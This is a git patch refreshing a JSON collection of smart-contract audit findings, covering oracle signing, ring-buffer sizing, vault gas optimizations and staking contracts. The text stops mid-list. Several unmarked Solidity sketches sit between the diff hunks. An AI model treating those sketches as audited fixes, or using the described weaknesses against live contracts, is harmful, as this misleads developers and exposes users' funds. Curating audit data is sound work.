From 2bd34eef446653401d9cbadca5bfab19d5a1fe48 Mon Sep 17 00:00:00 2001 From: automatoour Date: Mon, 9 Sep 2024 04:09:11 +0000 Subject: [PATCH] updated: data sources 2024-09-09 --- results/chainsecurity_findings.json | 16 +- results/slowmist_findings.json | 77 + results/zellic_findings.json | 3784 +++++++++++++++++++++++++++ 3 files changed, 3869 insertions(+), 8 deletions(-) diff --git a/results/chainsecurity_findings.json b/results/chainsecurity_findings.json index a785679..773115c 100644 --- a/results/chainsecurity_findings.json +++ b/results/chainsecurity_findings.json @@ -177,7 +177,7 @@ }, { "title": "5.3 Lift Does Not Drop Unfinalized opPoke", - "body": " ScribeOptimistic generally drops unfinalized optimistic poke data after the update of parameters to avoid any issues connected to an unexpected change of the verification result. _lift() is not overridden in ScribeOptimistic to call _afterAuthedAction(), which drops the unfinalized opPokeData. This may allow not-yet-authorized but soon-to-be feeds to sign the price update. CS-CSC-003 Assume Alice is not a member of the current feeds at t0, and t0 < t1 < t2. At t0, Alice signs a price with other bar-1 feeds and opPoke()s it. At t1, wards add Alice to the feeds. At t2, someone comes to challenge the opPokeData; the challenge fails (verification succeeds) and the pokeData becomes valid. In this example, Alice's signed data successfully passes the verification, though Alice has not been authorized at t0, the time the price data was aggregated. Risk accepted: Chronicle states: Chronicle - Scribe - 14 DesignLowVersion1RiskAcceptedCorrectnessLowVersion1RiskAccepted \fThis is a valid issue from a theoretical point of view. However, practically we don't see any problems arising through this. ", + "body": " ScribeOptimistic generally drops unfinalized optimistic poke data after the update of parameters to avoid any issues connected to an unexpected change of the verification result. _lift() is not overridden in ScribeOptimistic to call _afterAuthedAction(), which drops the unfinalized opPokeData. This may allow not-yet-authorized but soon-to-be feeds to sign the price update. CS-CSC-003 Assume Alice is not a member of the current feeds at t0, and t0 < t1 < t2. At t0, Alice signs a price with other bar-1 feeds and opPoke()s it. At t1, wards add Alice to the feeds. At t2, someone comes to challenge the opPokeData; the challenge fails (verification succeeds) and the pokeData becomes valid. In this example, Alice's signed data successfully passes the verification, though Alice has not been authorized at t0, the time the price data was aggregated. Risk accepted: Chronicle states: Chronicle - Scribe - 14 DesignLowVersion1RiskAcceptedCorrectnessLowVersion1RiskAccepted \fThis is a valid issue from a theoretical point of view. However, practically we don't see any problems arising through this. ", "labels": [ "ChainSecurity" ], },
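As a brief illustration of the fix shape this finding implies, here is a minimal hedged sketch of overriding the lift path in ScribeOptimistic so the shared post-auth hook runs; the signature and super call are assumptions, not the actual Scribe code:

    // Hypothetical override in ScribeOptimistic: run the shared
    // post-auth hook after lifting so unfinalized opPokeData is dropped.
    function _lift(LibSecp256k1.Point memory pubKey) internal override returns (uint) {
        uint index = super._lift(pubKey);
        _afterAuthedAction(); // drops any unfinalized opPokeData
        return index;
    }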
{ "title": "6.5 Gas Optimizations", - "body": " getSignerIndexLength() could load the length by assembly. In _verifySchnorrSignature(), lift(), and drop() the counter i inside of the for loop can be increased in an unchecked scope, as it is always bounded. CS-CSC-010 There is no amount limitation of inputs for abi.encodePacked(), thus one invocation should suffice to pack all the parameters in constructPokeMessage() and _constructOpPokeMessage(). In _verifySchnorrSignature(), loading a public key at an index can be abstracted into another internal function to decrease code duplication. In _lift(), the require statement index <= maxFeeds can be moved into the if branch, as we only need to check the number of feeds when a new public key is added. Chronicle - Scribe - 18 CorrectnessLowVersion1SpecificationChangedDesignLowVersion1CodeCorrectedInformationalVersion1CodeCorrected \f The first condition check (opPokeDataFinalized) can be removed in _opPoke(), as the function would already revert if it is false. if (!opPokeDataFinalized) { revert InChallengePeriod(); } uint32 age = opPokeDataFinalized && opPokeData.age > _pokeData.age ? opPokeData.age : _pokeData.age; In LibSchnorr, the following line can be wrapped in an unchecked scope. uint s = LibSecp256k1.Q() - mulmod(challenge, pubKey.x, LibSecp256k1.Q()); In addAffinePoint(), some intermediate results can be cached to avoid computing repeatedly. For example: uint left = mulmod(addmod(z1, h, _P), addmod(z1, h, _P), _P); uint v = mulmod(x1, mulmod(4, mulmod(h, h, _P), _P), _P); uint j = mulmod(4, mulmod(h, mulmod(h, h, _P), _P), _P); In addition, the following optimizations only work if the external view functions are called by a smart contract. In feeds(), the for loop counter i can start from 1 as the public key at index 0 is a zero point. And i can be increased in an unchecked scope. In feeds(uint index), the input index can be checked against 0 for early revert. And the public key at a specific index is not loaded by assembly as before. Code has been corrected to adopt some of the optimizations. Chronicle - Scribe - 19 \f7 Informational We utilize this section to point out informational findings that are less severe than issues. These informational issues allow us to point out more theoretical findings. Their explanation hopefully improves the overall understanding of the project's security. Furthermore, we point out findings which are unrelated to security. ", + "body": " getSignerIndexLength() could load the length by assembly. In _verifySchnorrSignature(), lift(), and drop() the counter i inside of the for loop can be increased in an unchecked scope, as it is always bounded. CS-CSC-010 There is no amount limitation of inputs for abi.encodePacked(), thus one invocation should suffice to pack all the parameters in constructPokeMessage() and _constructOpPokeMessage(). In _verifySchnorrSignature(), loading a public key at an index can be abstracted into another internal function to decrease code duplication. In _lift(), the require statement index <= maxFeeds can be moved into the if branch, as we only need to check the number of feeds when a new public key is added. Chronicle - Scribe - 18 CorrectnessLowVersion1SpecificationChangedDesignLowVersion1CodeCorrectedInformationalVersion1CodeCorrected \f The first condition check (opPokeDataFinalized) can be removed in _opPoke(), as the function would already revert if it is false. if (!opPokeDataFinalized) { revert InChallengePeriod(); } uint32 age = opPokeDataFinalized && opPokeData.age > _pokeData.age ? opPokeData.age : _pokeData.age; In LibSchnorr, the following line can be wrapped in an unchecked scope. uint s = LibSecp256k1.Q() - mulmod(challenge, pubKey.x, LibSecp256k1.Q()); In addAffinePoint(), some intermediate results can be cached to avoid computing repeatedly. For example: uint left = mulmod(addmod(z1, h, _P), addmod(z1, h, _P), _P); uint v = mulmod(x1, mulmod(4, mulmod(h, h, _P), _P), _P); uint j = mulmod(4, mulmod(h, mulmod(h, h, _P), _P), _P); In addition, the following optimizations only work if the external view functions are called by a smart contract. In feeds(), the for loop counter i can start from 1 as the public key at index 0 is a zero point. And i can be increased in an unchecked scope. In feeds(uint index), the input index can be checked against 0 for early revert. And the public key at a specific index is not loaded by assembly as before. Code has been corrected to adopt some of the optimizations. Chronicle - Scribe - 19 \f7 Informational We utilize this section to point out informational findings that are less severe than issues. These informational issues allow us to point out more theoretical findings. Their explanation hopefully improves the overall understanding of the project's security. Furthermore, we point out findings which are unrelated to security. ", "labels": [ "ChainSecurity" ],
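To make the unchecked-counter recommendation above concrete, a minimal sketch follows; the pubKeys array and loop body are placeholders, not Scribe's actual storage layout:

    // Generic bounded-loop pattern: the increment cannot overflow because
    // i is strictly bounded by pubKeys.length, so the overflow check can
    // be skipped to save gas on every iteration.
    for (uint i; i < pubKeys.length;) {
        // ... process pubKeys[i] ...
        unchecked { ++i; }
    }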
@@ -4921,7 +4921,7 @@ }, { "title": "7.2 Code Inconsistencies", - "body": " CS-GEARV21-006 1. For gas optimizations, the system tries to always keep 1 wei in the balances, and the standard way to check it across the codebase is with balance <= 1; however, in BlacklistHelper.claim() the check is amount < 2. 2. The Lido gateway transfers the full balance instead of balance-1 as everywhere else in the system (gas optimization). 3. In the adapters, _gearboxAdapterType is sometimes overridden as a constant, and some other times as a function. For consistency across the codebase, one of the two solutions should be chosen. Code partially corrected: 1. Changed to amount < 1. 2. Not addressed. 3. Not addressed. ", + "body": " CS-GEARV21-006 1. For gas optimizations, the system tries to always keep 1 wei in the balances, and the standard way to check it across the codebase is with balance <= 1; however, in BlacklistHelper.claim() the check is amount < 2. 2. The Lido gateway transfers the full balance instead of balance-1 as everywhere else in the system (gas optimization). 3. In the adapters, _gearboxAdapterType is sometimes overridden as a constant, and some other times as a function. For consistency across the codebase, one of the two solutions should be chosen. Code partially corrected: 1. Changed to amount < 1. 2. Not addressed. 3. Not addressed. ", "labels": [ "ChainSecurity" ], @@ -5633,7 +5633,7 @@ }, { "title": "6.1 Gas Optimizations", - "body": " EULEVC-005 In the EthereumVaultConnector contract, the public functions requireAccountStatusCheck, requireVaultStatusCheck, and requireAccountAndVaultStatusCheck are decorated with the nonReentrantChecks modifier. However, the functions perform different actions depending on whether checks are deferred or not. Since areChecksDeferred() and areChecksInProgress() are mutually exclusive (except transiently in the body of these functions), the reentrancy check can be moved to the internal version of the functions, which is called if checks are not deferred. This saves 3 storage accesses every time one of these functions is called. Several gas optimizations can be implemented in the Set library, all pertaining to writing values into structs that share a storage slot. If a and b share a storage slot, writing a new value into a requires first loading b from storage, so that the new [a,b] value can then be written to storage. If a and b are written together, the SLOAD is prevented.
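The slot-sharing point can be illustrated with a rough sketch; the field widths below are assumptions inferred from the finding, and whether consecutive writes coalesce into one SSTORE depends on the optimizer:

    struct SetStorage {
        uint8 numElements;    // these three fields pack into a
        address firstElement; // single 32-byte slot:
        uint88 stamp;         // 8 + 160 + 88 = 256 bits
    }

    uint88 constant DUMMY_STAMP = 1; // illustrative value

    function clear(SetStorage storage s) internal {
        // Overwriting every field that shares the slot lets the compiler
        // emit one SSTORE without an SLOAD to preserve untouched neighbors.
        s.numElements = 0;
        s.firstElement = address(0);
        s.stamp = DUMMY_STAMP;
    }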
The gas optimizations in question are: At the end of function insert, around line 94 (setStorage.numElements = uint8(numElements + 1)), a storage load can be prevented by also setting setStorage.firstElement, which is known, and setStorage.stamp, which is always DUMMY_STAMP in the setStorage struct. In function insert, when inserting at the end of the array (line 91), the stamp value can also be written, therefore saving a storage read. To know which value to set for stamp, the element-searching loop that is performed just before (lines 85-87) can also be used to query the stamp values of the array. They will either all be set (for transient sets), or all unset (for persistent sets), so when setting stamp at index i, the value of stamp at index i - 1 can be used (i >= 1). If the second element is being inserted (i == 0), then the extra SLOAD can't be avoided, since the old value of stamp must be retrieved. In function remove, when replacing the removed element with the last element, at line 143, the stamp value can also be written to prevent an SLOAD. The stamp value to write can be known at no extra storage load costs. Euler - Ethereum Vault Connector - 15 CriticalHighMediumLowCodeCorrectedCodeCorrectedCodeCorrectedInformationalVersion1CodeCorrected \fIn function reorder, if index1 == 0, setStorage.numElements and setStorage.stamp can be set to their known values to prevent an extra SLOAD. In functions forEachAndClear and forEachAndClearWithResult, when clearing setStorage.numElements and setStorage.firstElement, setStorage.stamp can be set to DUMMY_STAMP to prevent an extra SLOAD. Because some functions are only used on transient sets (forEachAndClear), and some others only on persistent sets (reorder), extra optimizations are available if we accept tighter coupling between the Set implementation and the EthereumVaultConnector: When clearing the array elements in forEachAndClear (and forEachAndClearWithResult), we can also write setStorage.elements[i].stamp = DUMMY_STAMP, since forEachAndClear() is only used on transient sets, which are known to have every stamp set to DUMMY_STAMP. reorder() is only used on persistent sets of accountCollaterals, which are known to have stamp value 0 for entries of the elements array. Therefore, the stamp value can be set to 0 when writing the value of entries, saving extra SLOADs. After evaluation by Euler, some of the optimizations were implemented while others were considered to slightly complicate the logic of the contract or increase the gas consumption. The following optimizations were implemented: two additional internal functions, requireAccountStatusCheckInternalNonReentrant and requireVaultStatusCheckInternalNonReentrant, which wrap requireAccountStatusCheckInternal and requireVaultStatusCheckInternal accordingly, have been added to the EthereumVaultConnector and used in the requireAccountStatusCheck, requireVaultStatusCheck, and requireAccountAndVaultStatusCheck functions. forEachAndClear and forEachAndClearWithResult have been modified. ", + "body": " EULEVC-005 In the EthereumVaultConnector contract, the public functions requireAccountStatusCheck, requireVaultStatusCheck, and requireAccountAndVaultStatusCheck are decorated with the nonReentrantChecks modifier. However, the functions perform different actions depending on whether checks are deferred or not.
Since areChecksDeferred() and areChecksInProgress() are mutually exclusive (except transiently in the body of these functions), the reentrancy check can be moved to the internal version of the functions, which is called if checks are not deferred. This saves 3 storage accesses every time one of these functions is called. Several gas optimizations can be implemented in the Set library, all pertaining to writing values into structs that share a storage slot. If a and b share a storage slot, writing a new value into a requires first loading b from storage, so that the new [a,b] value can then be written to storage. If a and b are written together, the SLOAD is prevented. The gas optimizations in question are: At the end of function insert, around line 94 (setStorage.numElements = uint8(numElements + 1)), a storage load can be prevented by also setting setStorage.firstElement, which is known, and setStorage.stamp, which is always DUMMY_STAMP in the setStorage struct. In function insert, when inserting at the end of the array (line 91), the stamp value can also be written, therefore saving a storage read. To know which value to set for stamp, the element-searching loop that is performed just before (lines 85-87) can also be used to query the stamp values of the array. They will either all be set (for transient sets), or all unset (for persistent sets), so when setting stamp at index i, the value of stamp at index i - 1 can be used (i >= 1). If the second element is being inserted (i == 0), then the extra SLOAD can't be avoided, since the old value of stamp must be retrieved. In function remove, when replacing the removed element with the last element, at line 143, the stamp value can also be written to prevent an SLOAD. The stamp value to write can be known at no extra storage load costs. Euler - Ethereum Vault Connector - 15 CriticalHighMediumLowCodeCorrectedCodeCorrectedCodeCorrectedInformationalVersion1CodeCorrected \fIn function reorder, if index1 == 0, setStorage.numElements and setStorage.stamp can be set to their known values to prevent an extra SLOAD. In functions forEachAndClear and forEachAndClearWithResult, when clearing setStorage.numElements and setStorage.firstElement, setStorage.stamp can be set to DUMMY_STAMP to prevent an extra SLOAD. Because some functions are only used on transient sets (forEachAndClear), and some others only on persistent sets (reorder), extra optimizations are available if we accept tighter coupling between the Set implementation and the EthereumVaultConnector: When clearing the array elements in forEachAndClear (and forEachAndClearWithResult), we can also write setStorage.elements[i].stamp = DUMMY_STAMP, since forEachAndClear() is only used on transient sets, which are known to have every stamp set to DUMMY_STAMP. reorder() is only used on persistent sets of accountCollaterals, which are known to have stamp value 0 for entries of the elements array. Therefore, the stamp value can be set to 0 when writing the value of entries, saving extra SLOADs. After evaluation by Euler, some of the optimizations were implemented while others were considered to slightly complicate the logic of the contract or increase the gas consumption.
The following optimizations were implemented: two additional internal functions, requireAccountStatusCheckInternalNonReentrant and requireVaultStatusCheckInternalNonReentrant, which wrap requireAccountStatusCheckInternal and requireVaultStatusCheckInternal accordingly, have been added to the EthereumVaultConnector and used in the requireAccountStatusCheck, requireVaultStatusCheck, and requireAccountAndVaultStatusCheck functions. forEachAndClear and forEachAndClearWithResult have been modified. ", "labels": [ "ChainSecurity" ], @@ -9233,7 +9233,7 @@ }, { "title": "6.2 Implications of Ring Buffer Size", - "body": " The EIP-4788 states: The ring buffer data structures are sized to hold 8192 roots from the consensus layer at current slot timings. CS-EIP4788-008 Ethereum Foundation - EIP-4788 Contract - 11 CriticalHighCodeCorrectedMediumLowCodeCorrectedSpecificationChangedCodeCorrectedCorrectnessHighVersion1CodeCorrectedDesignLowVersion1CodeCorrectedSpecificationChanged \fThe code implements the circular buffer; however, out of 98304 slots, only 8192 will be utilized at the current SECONDS_PER_SLOT = 12 on the mainnet. Effectively the ring buffer behaves as a ring of integers modulo n, where n is its size. The ( current_timestamp + X * SECONDS_PER_SLOT ) mod 98304 function will produce a cyclic subgroup of order 8192 if SECONDS_PER_SLOT is 12. However, if, in the future, the SECONDS_PER_SLOT would change to 16, the cyclic subgroup will have order 6144, which is less than 8192. Furthermore, many old entries from the 12-second interval would uselessly remain in the ring buffer. Thus, the requirement of the EIP-4788 to have 8192 roots available in the ring buffer will not be satisfied if the SECONDS_PER_SLOT changes to 16 seconds. If the SECONDS_PER_SLOT changes to 13 seconds, the cyclic subgroup will have order 98304, thus increasing the storage requirements for the ring buffer by 12 times. To summarize, 98304 as a group order for the ring buffer is not an ideal choice, as it is not a prime number. Potential changes to the SECONDS_PER_SLOT will drastically change the behavior of the ring buffer. If the ( current_timestamp + X * SECONDS_PER_SLOT ) mod 8209 function is used instead, the cyclic subgroup will always have order 8209, since it is a prime number. That would have two key advantages: The ring buffer could always hold the most recent 8209 beacon roots independent of SECONDS_PER_SLOT. The storage consumption would remain constant even when SECONDS_PER_SLOT changes. If the primary objective is to make sure that the ring buffer can hold all beacon roots of the past 24 hours, then a prime ring buffer size still makes sense, but a bigger one has to be chosen, according to the lowest value SECONDS_PER_SLOT might have in the future. Please note that the changes discussed here would require a change in the specification. The specification has been changed to make the ring buffer size 8191, which is a prime number. The code has been changed accordingly. Hence, the new implementation benefits from the positive effects described above. ", + "body": " The EIP-4788 states: The ring buffer data structures are sized to hold 8192 roots from the consensus layer at current slot timings. CS-EIP4788-008 Ethereum Foundation - EIP-4788 Contract - 11 CriticalHighCodeCorrectedMediumLowCodeCorrectedSpecificationChangedCodeCorrectedCorrectnessHighVersion1CodeCorrectedDesignLowVersion1CodeCorrectedSpecificationChanged \fThe code implements the circular buffer; however, out of 98304 slots, only 8192 will be utilized at the current SECONDS_PER_SLOT = 12 on the mainnet.
Effectively the ring buffer behaves as a ring of integers modulo n, where n is its size. The ( current_timestamp + X * SECONDS_PER_SLOT ) mod 98304 function will produce a cyclic subgroup of order 8192 if SECONDS_PER_SLOT is 12. However, if, in the future, the SECONDS_PER_SLOT would change to 16, the cyclic subgroup will have order 6144, which is less than 8192. Furthermore, many old entries from the 12-second interval would uselessly remain in the ring buffer. Thus, the requirement of the EIP-4788 to have 8192 roots available in the ring buffer will not be satisfied if the SECONDS_PER_SLOT changes to 16 seconds. If the SECONDS_PER_SLOT changes to 13 seconds, the cyclic subgroup will have order 98304, thus increasing the storage requirements for the ring buffer by 12 times. To summarize, 98304 as a group order for the ring buffer is not an ideal choice, as it is not a prime number. Potential changes to the SECONDS_PER_SLOT will drastically change the behavior of the ring buffer. If the ( current_timestamp + X * SECONDS_PER_SLOT ) mod 8209 function is used instead, the cyclic subgroup will always have order 8209, since it is a prime number. That would have two key advantages: The ring buffer could always hold the most recent 8209 beacon roots independent of SECONDS_PER_SLOT. The storage consumption would remain constant even when SECONDS_PER_SLOT changes. If the primary objective is to make sure that the ring buffer can hold all beacon roots of the past 24 hours, then a prime ring buffer size still makes sense, but a bigger one has to be chosen, according to the lowest value SECONDS_PER_SLOT might have in the future. Please note that the changes discussed here would require a change in the specification. The specification has been changed to make the ring buffer size 8191, which is a prime number. The code has been changed accordingly. Hence, the new implementation benefits from the positive effects described above. ", "labels": [ "ChainSecurity" ],
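The subgroup-order arithmetic above can be made concrete with a small sketch; BUFFER_SIZE and the index helper are illustrative, not the EIP-4788 contract code:

    // With the old composite size 98304 and 12-second slots, timestamps step
    // by 12, so only 98304 / gcd(12, 98304) = 8192 distinct indices are ever
    // hit; with 16-second slots this drops to 98304 / 16 = 6144. A prime
    // modulus shares no factor with any slot length, so every index is used.
    uint256 constant BUFFER_SIZE = 8191; // prime, per the updated specification

    function rootIndex(uint256 timestamp) pure returns (uint256) {
        return timestamp % BUFFER_SIZE;
    }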
@@ -11585,7 +11585,7 @@ }, { "title": "6.9 No Recovery of Accidental Token Transfers", - "body": " In case an ERC-20 token other than the base tokens or collateral tokens is sent to the contract, then it cannot be recovered. Among other reasons, this might happen due to airdrops based on the base tokens or collateral tokens. A new function approveThis has been introduced to allow the governance to approve any ERC20 token to any address. Compound - Comet - 17 DesignLowVersion1CodeCorrectedDesignLowVersion1CodeCorrected \f6.10 Possible Contract Size Reductions Instead of creating an empty AssetConfig, and later returning (0, 0), the function _getPackedAsset could directly return (0, 0). The functions isBorrowCollateralized, getBorrowLiquidity, isLiquidatable and getLiquidationMargin share the same code with marginal modifications. The overlapping code could be factored out into new functions to save code size. The baseScale variable is only needed internally and is derived from decimals and can thus be defined as internal to reduce code size. The initialization of trackingSupplyIndex and trackingBorrowIndex to 0 in the initializeStorage function can be omitted. Corrected: _getPackedAsset now directly returns (0, 0) if an AssetConfig element is empty. Not corrected: Compound claims that the compiler optimizations already account for a sufficient contract size reduction in isBorrowCollateralized, getBorrowLiquidity, isLiquidatable and getLiquidationMargin. Not corrected: Compound does not want to make an exception for one variable. Corrected: trackingSupplyIndex and trackingBorrowIndex are no longer initialized to 0. ", + "body": " In case an ERC-20 token other than the base tokens or collateral tokens is sent to the contract, then it cannot be recovered. Among other reasons, this might happen due to airdrops based on the base tokens or collateral tokens. A new function approveThis has been introduced to allow the governance to approve any ERC20 token to any address. Compound - Comet - 17 DesignLowVersion1CodeCorrectedDesignLowVersion1CodeCorrected \f6.10 Possible Contract Size Reductions Instead of creating an empty AssetConfig, and later returning (0, 0), the function _getPackedAsset could directly return (0, 0). The functions isBorrowCollateralized, getBorrowLiquidity, isLiquidatable and getLiquidationMargin share the same code with marginal modifications. The overlapping code could be factored out into new functions to save code size. The baseScale variable is only needed internally and is derived from decimals and can thus be defined as internal to reduce code size. The initialization of trackingSupplyIndex and trackingBorrowIndex to 0 in the initializeStorage function can be omitted. Corrected: _getPackedAsset now directly returns (0, 0) if an AssetConfig element is empty. Not corrected: Compound claims that the compiler optimizations already account for a sufficient contract size reduction in isBorrowCollateralized, getBorrowLiquidity, isLiquidatable and getLiquidationMargin. Not corrected: Compound does not want to make an exception for one variable. Corrected: trackingSupplyIndex and trackingBorrowIndex are no longer initialized to 0. ", "labels": [ "ChainSecurity" ], @@ -12393,7 +12393,7 @@ }, { "title": "6.3 Farms Rely on Token to Checkpoint", - "body": " Farm._updateFarmingState() calls checkpoint() of an external ERC20Farmable contract. Then, the ERC20Farmable contract calls Farm.farmingCheckpoint(). However, a malicious ERC20Farmable implementation could purposefully leave out the call to Farm.farmingCheckpoint(). Hence, the farm checkpoints could remain without updates. farmingCheckpoint has been removed from the farm contracts. Hence, there is no need to call it. ", + "body": " Farm._updateFarmingState() calls checkpoint() of an external ERC20Farmable contract. Then, the ERC20Farmable contract calls Farm.farmingCheckpoint(). However, a malicious ERC20Farmable implementation could purposefully leave out the call to Farm.farmingCheckpoint(). Hence, the farm checkpoints could remain without updates. farmingCheckpoint has been removed from the farm contracts. Hence, there is no need to call it. ", "labels": [ "ChainSecurity" ], @@ -17089,7 +17089,7 @@ }, { "title": "7.33 Gas Optimizations", - "body": " CS-EVERSTKB2C-011 1. The type casting from address to address is not required in Pool.initialize(), removing it might save gas during initialization depending on the compiler's optimization setting. 2. pendingValidatorPubKey is read twice from storage in Pool._deposit(), the value could be cached in memory to avoid one SLOAD. 3. The checks of the form a != b && a != c can be modified following De Morgan's law (!(a == b || a == c)) to leverage the lazy evaluation of the condition and save gas on runtime. 4.
Some function arguments on call can be replaced by constants. Some examples are: Accounting._activateRound(): the variable activeRound can be replaced by 0 in the call _makeAutocompoundRoundCheckpoint(activeRound). Accounting._depositBalance(): in the call to _activateRound() of the branch if (pendingAmount > 0), the parameter pendingTotalShare + closeCurrentRoundAmount can be replaced by BEACON_AMOUNT. Accounting._depositBalance(): in the call to _depositAccount() of the branch if (depositToPendingAmount > 0), the parameter interchangedAmount will always be 0. Accounting._depositBalance(): in the call to AUTO_COMPOUND_PENDING_SHARE_POSITION.setStorageUint256() of the branch if (depositToPendingAmount > 0), the parameter pendingTotalShare will always be 0. 5. The activatedSlots in the branch if (pendingTotalShare > 0) of the function Accounting._depositBalance() can be set to 1 instead of incrementing the variable to save gas on runtime. 6. The while loop and the multiple increments of the stack variables in the branch if (depositToPendingAmount >= BEACON_AMOUNT) of the function Accounting._depositBalance can be replaced by one update for each involved variable. If the while loop was to stay, a do-while construct could save gas. The same applies in _simulateAutocompound(). 7. Setting pendingTotalShare to 0 in the branch if (depositToPendingAmount >= BEACON_AMOUNT) of the function Accounting._depositBalance is redundant. 8. The while loop in the function Accounting.withdraw() can be simplified since, in the case isFullyDeposited == false, the remaining interchangeWithPendingDeposits is zero. 9. In the branch if (withdrawFromPendingAmount > 0) of the function Accounting.withdraw, pendingRestakedValue - withdrawFromPendingAmount is computed twice while it could be done only once. Everstake - ETH B2C Staking - 28 InformationalVersion1CodeCorrected \f10. In the function Accounting.withdraw, the pendingTotalShare is read from storage twice when it could be cached in the memory. 11. In the branch if (unclaimedReward < MIN_RESTAKE_POSITION.getStorageUint256()) of the function Accounting._simulateAutocompound(), the constant 0 can be used instead of unclaimedReward in the return statement. 12. When simulating the withdraw queue filling in Accounting._simulateAutocompound(), the if/else branches could be unified the same way it is done in Withdrawer._interchangeWithdraw(). 13. The modifier Governor.onlyGovernor() does the address check after executing the code. Reverting early would save gas. 14. In the function Pool._stake(), value cannot be zero. 15. The increment i++ can be in an unchecked block in multiple for loops. 16. The function Withdrawer._calculateValidatorClose can return only one value, as the two values are linked by a constant factor; one can easily deduce a value from the other one. 17. In the function Withdrawer._calculateWithdrawRequestAmount, the condition if withdrawFromActiveDeposit > 0 will always be true when withdrawFromActiveDeposit > pendingTotalShare is true and is hence redundant. 18. In the function WithdrawRequests.add, the assignment requests._values[i] = request can be moved inside the if (requests._values[i].value == 0) block and the function can return right after. 19. In the functions WithdrawRequests.claim and WithdrawRequests.info, requests.value[i].afterFilledAmount is read twice from the storage while it could be cached to avoid one SLOAD. 20.
In the functions WithdrawRequests.claim and WithdrawRequests.info, the condition requests._values[i].afterFilledAmount > actualFilledAmount can be relaxed to an unstrict comparison, since if requests._values[i].afterFilledAmount == actualFilledAmount their difference is null. 21. In the function WithdrawRequests.info, requests._values.length is read from the storage at each iteration of the loop. Caching it in the memory would avoid several SLOAD. 22. In the function ValidatorList.add, set._activeValidatorIndex and set._activePendingElementIndex are both read three times from the storage when their value could be cached in the memory. 23. In the function ValidatorList.shift, set._activePendingElementIndex is read two times from the storage when its value could be cached in the memory. 24. In the functions _autocompoundAccount, _autoCompoundUserPendingDepositedBalance, _autoCompoundUserBalance, and _withdrawFromAutocompound of AutocompoundAccounting, the field pendingDepositedBalances.length of the staker is read from the storage at each iteration of the loop. Caching it in the memory would avoid several SLOAD. 25. In the first for loop of the function AutocompoundAccounting._autocompoundAccount, both staker.pendingDepositedBalances[j].period and staker.activePendingDepositedElementIndex are read twice from the storage and could be cached. 26. In AutocompoundAccounting._autocompoundAccount(), when updating the pending status to pendingDeposited, one execution path reads staker.activePendingDepositedElementIndex three times from storage; it could be cached. Everstake - ETH B2C Staking - 29 \f27. In AutocompoundAccounting._autocompoundAccount(), when updating the pending status to pendingDeposited or to activated, both staker.pendingBalance.balance and staker.pendingBalance.period are read twice from storage. 28. In AutocompoundAccounting._autoCompoundUserPendingDepositedBalance(), staker.pendingBalance.period is read twice from storage. 29. In AutocompoundAccounting._autoCompoundUserBalance(), at each iteration of the for loop, if the condition of the if statement is not met, both stakerAutocompoundBalance.pendingDepositedBalances[j].balance and stakerAutocompoundBalance.pendingDepositedBalances[j].period are read twice from storage. 30. The calls to _userActiveBalance to get only the depositedBalance could be replaced by a simple storage read to save gas. 31. At the end of Accounting._simulateAutocompound(), pendingAmount == pendingRestaked always holds as, if if (pendingAmount > 0) is entered, then they are both set to 0. Otherwise pendingAmount == 0, and one should always have pendingAmount >= pendingRestaked, meaning that there is no need to keep both variables for the while loop. The gas optimizations have been applied. ", + "body": " CS-EVERSTKB2C-011 1. The type casting from address to address is not required in Pool.initialize(), removing it might save gas during initialization depending on the compiler's optimization setting. 2. pendingValidatorPubKey is read twice from storage in Pool._deposit(), the value could be cached in memory to avoid one SLOAD. 3. The checks of the form a != b && a != c can be modified following De Morgan's law (!(a == b || a == c)) to leverage the lazy evaluation of the condition and save gas on runtime. 4. Some function arguments on call can be replaced by constants. Some examples are: Accounting._activateRound(): the variable activeRound can be replaced by 0 in the call _makeAutocompoundRoundCheckpoint(activeRound).
Accounting._depositBalance(): in the call to _activateRound() of the branch if (pendingAmount > 0), the parameter pendingTotalShare + closeCurrentRoundAmount can be replaced by BEACON_AMOUNT. Accounting._depositBalance(): in the call to _depositAccount() of the branch if (depositToPendingAmount > 0), the parameter interchangedAmount will always be 0. Accounting._depositBalance(): in the call to AUTO_COMPOUND_PENDING_SHARE_POSITION.setStorageUint256() of the branch if (depositToPendingAmount > 0), the parameter pendingTotalShare will always be 0. 5. The activatedSlots in the branch if (pendingTotalShare > 0) of the function Accounting._depositBalance() can be set to 1 instead of incrementing the variable to save gas on runtime. 6. The while loop and the multiple increments of the stack variables in the branch if (depositToPendingAmount >= BEACON_AMOUNT) of the function Accounting._depositBalance can be replaced by one update for each involved variable. If the while loop was to stay, a do-while construct could save gas. The same applies in _simulateAutocompound(). 7. Setting pendingTotalShare to 0 in the branch if (depositToPendingAmount >= BEACON_AMOUNT) of the function Accounting._depositBalance is redundant. 8. The while loop in the function Accounting.withdraw() can be simplified since, in the case isFullyDeposited == false, the remaining interchangeWithPendingDeposits is zero. 9. In the branch if (withdrawFromPendingAmount > 0) of the function Accounting.withdraw, pendingRestakedValue - withdrawFromPendingAmount is computed twice while it could be done only once. Everstake - ETH B2C Staking - 28 InformationalVersion1CodeCorrected \f10. In the function Accounting.withdraw, the pendingTotalShare is read from storage twice when it could be cached in the memory. 11. In the branch if (unclaimedReward < MIN_RESTAKE_POSITION.getStorageUint256()) of the function Accounting._simulateAutocompound(), the constant 0 can be used instead of unclaimedReward in the return statement. 12. When simulating the withdraw queue filling in Accounting._simulateAutocompound(), the if/else branches could be unified the same way it is done in Withdrawer._interchangeWithdraw(). 13. The modifier Governor.onlyGovernor() does the address check after executing the code. Reverting early would save gas. 14. In the function Pool._stake(), value cannot be zero. 15. The increment i++ can be in an unchecked block in multiple for loops. 16. The function Withdrawer._calculateValidatorClose can return only one value, as the two values are linked by a constant factor; one can easily deduce a value from the other one. 17. In the function Withdrawer._calculateWithdrawRequestAmount, the condition if withdrawFromActiveDeposit > 0 will always be true when withdrawFromActiveDeposit > pendingTotalShare is true and is hence redundant. 18. In the function WithdrawRequests.add, the assignment requests._values[i] = request can be moved inside the if (requests._values[i].value == 0) block and the function can return right after. 19. In the functions WithdrawRequests.claim and WithdrawRequests.info, requests.value[i].afterFilledAmount is read twice from the storage while it could be cached to avoid one SLOAD. 20. In the functions WithdrawRequests.claim and WithdrawRequests.info, the condition requests._values[i].afterFilledAmount > actualFilledAmount can be relaxed to an unstrict comparison, since if requests._values[i].afterFilledAmount == actualFilledAmount their difference is null. 21.
